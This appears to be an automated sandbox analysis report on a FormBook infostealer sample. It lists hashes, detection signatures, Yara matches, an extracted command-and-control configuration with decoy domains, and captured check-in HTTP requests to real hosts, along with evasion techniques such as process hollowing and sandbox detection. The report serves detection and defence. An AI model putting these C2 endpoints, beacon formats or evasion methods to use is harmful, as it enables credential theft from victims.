Windows Analysis Report scan files 15-9-21.exe

Overview

General Information

Sample Name: scan files 15-9-21.exe
Analysis ID: 483582
MD5: 00e32d8a2cbd54e967bfc8f512086ecf
SHA1: f51b70a2117089a87b0daf6f179a3b492acf58f2
SHA256: 36d409b61a0f456cb3e593338ebf2db1fae38ea645392d98030bc7e7a0eb9a3c
Tags: exeFormbookxloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.lifewithbriana.com/mej0/"], "decoy": ["mtxs8.com", "quickskiplondon.com", "sltplanner.com", "generatedate.com", "amsinspections.com", "tomrings.com", "109friends.com", "freelovereading.com", "avalapartners.com", "nordiqueluxury.com", "inmbex.com", "everybankatm.com", "bo1899.com", "ashymeadow.com", "pubgm-chickendinner.com", "takudolunch.com", "carlagremiao.com", "actonetheatre.com", "wemhealth.com", "khasomat.net", "lartiqueusa.com", "singularity.institute", "ashsgx567d.com", "sequoiaparts.net", "ujriksalead.com", "ag99.xyz", "isabeltimon.com", "bijyo-topic.site", "homefuels.energy", "2ofakinddesigns.com", "iggglobal.com", "ravenlightproductions.com", "magicaltransform.com", "2936vaquero.com", "essentialme.network", "thebrathouse.info", "tecstrong.net", "ayulaksmi.com", "maximebazerque.com", "bankdj.com", "pizzaoff.com", "eastcohemp.com", "acordolimpo.com", "mediacpstreamchile.com", "wholesalefleuerdelis.com", "chuangyuanfz.com", "getcenteredwithclay.com", "retaboo.com", "ikonicboatcharters.com", "parakhonskiy.com", "tropical-therapy.com", "metropitstop.com", "municipiodeanton.net", "valorplanodesaudemaranhao.info", "alibabakanaat.com", "creditsoptionsnow.com", "arabgerman.digital", "webspazio.com", "sunsyncindia.com", "jlsolutionspty.com", "almightyamerican.com", "nadirshirts.com", "gdxinmu.com", "postcaremedical.com"]}
Multi AV Scanner detection for submitted file
Source: scan files 15-9-21.exe Virustotal: Detection: 29% Perma Link
Source: scan files 15-9-21.exe ReversingLabs: Detection: 26%
Yara detected FormBook
Source: Yara match File source: 2.2.scan files 15-9-21.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.scan files 15-9-21.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.296739231.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.316398859.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.520331838.0000000000870000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.342785187.0000000001600000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.520884940.0000000000A80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.521187644.0000000000B00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.262326263.0000000003979000.00000004.00000001.sdmp, type: MEMORY
Machine Learning detection for sample
Source: scan files 15-9-21.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 2.2.scan files 15-9-21.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses 32bit PE files
Source: scan files 15-9-21.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: scan files 15-9-21.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: WWAHost.pdb source: scan files 15-9-21.exe, 00000002.00000003.335101550.0000000003940000.00000004.00000001.sdmp
Source: Binary string: WWAHost.pdbUGP source: scan files 15-9-21.exe, 00000002.00000003.335101550.0000000003940000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: scan files 15-9-21.exe, 00000002.00000002.343119287.0000000001AC0000.00000040.00000001.sdmp, WWAHost.exe, 0000000D.00000002.525382273.0000000003640000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: scan files 15-9-21.exe, 00000002.00000002.343119287.0000000001AC0000.00000040.00000001.sdmp, WWAHost.exe

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 4x nop then pop ebx 2_2_00406A97
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 4x nop then pop edi 2_2_00415692
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 4x nop then pop ebx 13_2_00876A97
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 4x nop then pop edi 13_2_00885692

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49777 -> 34.98.99.30:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49777 -> 34.98.99.30:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49777 -> 34.98.99.30:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49779 -> 35.237.65.63:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49779 -> 35.237.65.63:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49779 -> 35.237.65.63:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49785 -> 99.83.154.118:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49785 -> 99.83.154.118:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49785 -> 99.83.154.118:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.valorplanodesaudemaranhao.info
Source: C:\Windows\explorer.exe Network Connect: 172.67.196.84 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.everybankatm.com
Source: C:\Windows\explorer.exe Domain query: www.nordiqueluxury.com
Source: C:\Windows\explorer.exe Domain query: www.quickskiplondon.com
Source: C:\Windows\explorer.exe Network Connect: 34.98.99.30 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.singularity.institute
Source: C:\Windows\explorer.exe Domain query: www.parakhonskiy.com
Source: C:\Windows\explorer.exe Domain query: www.lifewithbriana.com
Source: C:\Windows\explorer.exe Network Connect: 35.237.65.63 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 84.34.147.60 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.municipiodeanton.net
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.lifewithbriana.com/mej0/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: TSF-IP-CORETeliaFinlandOyjEU TSF-IP-CORETeliaFinlandOyjEU
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /mej0/?ZTSpa=l0iLI2tDMbyWX17YzQI3VU6Ovc+Srds2u4QKsmMGezHC91xioYtP6wjZJcIMhpUbXqNeFFgVfw==&vP=JtCxKN HTTP/1.1Host: www.nordiqueluxury.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mej0/?ZTSpa=JBp6XH2M4Q0SiKTdqMGnH1VhHOjyZ1YS2BfWCv8a5VwMthBJctfaCfrdZAs0prUxB4i8ziLjxQ==&vP=JtCxKN HTTP/1.1Host: www.valorplanodesaudemaranhao.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mej0/?ZTSpa=KB5aME/wLlFyZRHVaeByRa16oaYSLG5vTwTmPkRiuCF7mWnEGcyzal0mWpntA1EdT4HAAexMQQ==&vP=JtCxKN HTTP/1.1Host: www.municipiodeanton.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mej0/?ZTSpa=a/1Q0lHImOSlB3OMiE52M5irpU60+rDCM9jGEsCAFmqZfqxrPXb+yY2uJ0P5II+wgFq1rM2W6g==&vP=JtCxKN HTTP/1.1Host: www.quickskiplondon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mej0/?ZTSpa=RzUuUNIP5w6/jz6u/3nPHL71H0tFSqxvyYqd1E+XwjP7nDbVm/SW3vaLh5vwv8/S3nR/rxiqcA==&vP=JtCxKN HTTP/1.1Host: www.singularity.instituteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: explorer.exe, 00000003.00000000.270733342.000000000686B000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: unknown DNS traffic detected: queries for: www.parakhonskiy.com
Source: global traffic HTTP traffic detected: GET /mej0/?ZTSpa=l0iLI2tDMbyWX17YzQI3VU6Ovc+Srds2u4QKsmMGezHC91xioYtP6wjZJcIMhpUbXqNeFFgVfw==&vP=JtCxKN HTTP/1.1Host: www.nordiqueluxury.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mej0/?ZTSpa=JBp6XH2M4Q0SiKTdqMGnH1VhHOjyZ1YS2BfWCv8a5VwMthBJctfaCfrdZAs0prUxB4i8ziLjxQ==&vP=JtCxKN HTTP/1.1Host: www.valorplanodesaudemaranhao.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mej0/?ZTSpa=KB5aME/wLlFyZRHVaeByRa16oaYSLG5vTwTmPkRiuCF7mWnEGcyzal0mWpntA1EdT4HAAexMQQ==&vP=JtCxKN HTTP/1.1Host: www.municipiodeanton.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mej0/?ZTSpa=a/1Q0lHImOSlB3OMiE52M5irpU60+rDCM9jGEsCAFmqZfqxrPXb+yY2uJ0P5II+wgFq1rM2W6g==&vP=JtCxKN HTTP/1.1Host: www.quickskiplondon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mej0/?ZTSpa=RzUuUNIP5w6/jz6u/3nPHL71H0tFSqxvyYqd1E+XwjP7nDbVm/SW3vaLh5vwv8/S3nR/rxiqcA==&vP=JtCxKN HTTP/1.1Host: www.singularity.instituteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 2.2.scan files 15-9-21.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.scan files 15-9-21.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.296739231.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.316398859.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.520331838.0000000000870000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.342785187.0000000001600000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.520884940.0000000000A80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.521187644.0000000000B00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.262326263.0000000003979000.00000004.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 2.2.scan files 15-9-21.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.scan files 15-9-21.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.scan files 15-9-21.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.scan files 15-9-21.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.296739231.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.296739231.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.316398859.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.316398859.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.520331838.0000000000870000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.520331838.0000000000870000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.342785187.0000000001600000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.342785187.0000000001600000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.520884940.0000000000A80000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.520884940.0000000000A80000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.521187644.0000000000B00000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.521187644.0000000000B00000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.262326263.0000000003979000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.262326263.0000000003979000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
.NET source code contains very large strings
Source: scan files 15-9-21.exe, Forms/mainForm.cs Long String: Length: 38272
Source: 0.0.scan files 15-9-21.exe.580000.0.unpack, Forms/mainForm.cs Long String: Length: 38272
Source: 0.2.scan files 15-9-21.exe.580000.0.unpack, Forms/mainForm.cs Long String: Length: 38272
Source: 2.2.scan files 15-9-21.exe.fd0000.1.unpack, Forms/mainForm.cs Long String: Length: 38272
Source: 2.0.scan files 15-9-21.exe.fd0000.0.unpack, Forms/mainForm.cs Long String: Length: 38272
Uses 32bit PE files
Source: scan files 15-9-21.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 2.2.scan files 15-9-21.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.scan files 15-9-21.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.scan files 15-9-21.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.scan files 15-9-21.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.296739231.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.296739231.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.316398859.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.316398859.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.520331838.0000000000870000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.520331838.0000000000870000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.342785187.0000000001600000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.342785187.0000000001600000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.520884940.0000000000A80000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.520884940.0000000000A80000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.521187644.0000000000B00000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.521187644.0000000000B00000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.262326263.0000000003979000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.262326263.0000000003979000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_028530C0 0_2_028530C0
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_02856150 0_2_02856150
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_028530B2 0_2_028530B2
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_028514FA 0_2_028514FA
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_02851448 0_2_02851448
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_02851458 0_2_02851458
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_02850D88 0_2_02850D88
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_02850D98 0_2_02850D98
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_02852DD7 0_2_02852DD7
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_02852DE8 0_2_02852DE8
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_04E847B0 0_2_04E847B0
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_04E8804C 0_2_04E8804C
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_04E8BF38 0_2_04E8BF38
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_04E8EACB 0_2_04E8EACB
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_04E847A3 0_2_04E847A3
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_04E8A100 0_2_04E8A100
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_04E88104 0_2_04E88104
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_00401030 2_2_00401030
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_00401174 2_2_00401174
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041B9BD 2_2_0041B9BD
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041BA6D 2_2_0041BA6D
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041C31E 2_2_0041C31E
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041CB97 2_2_0041CB97
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_00408C60 2_2_00408C60
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_00402D87 2_2_00402D87
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_00402D90 2_2_00402D90
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041C597 2_2_0041C597
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041C77C 2_2_0041C77C
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041BFCB 2_2_0041BFCB
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041B7E3 2_2_0041B7E3
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_00402FB0 2_2_00402FB0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369EBB0 13_2_0369EBB0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03686E30 13_2_03686E30
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03731D55 13_2_03731D55
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03660D20 13_2_03660D20
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03684120 13_2_03684120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366F900 13_2_0366F900
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367D5E0 13_2_0367D5E0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03692581 13_2_03692581
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721002 13_2_03721002
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367841F 13_2_0367841F
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036920A0 13_2_036920A0
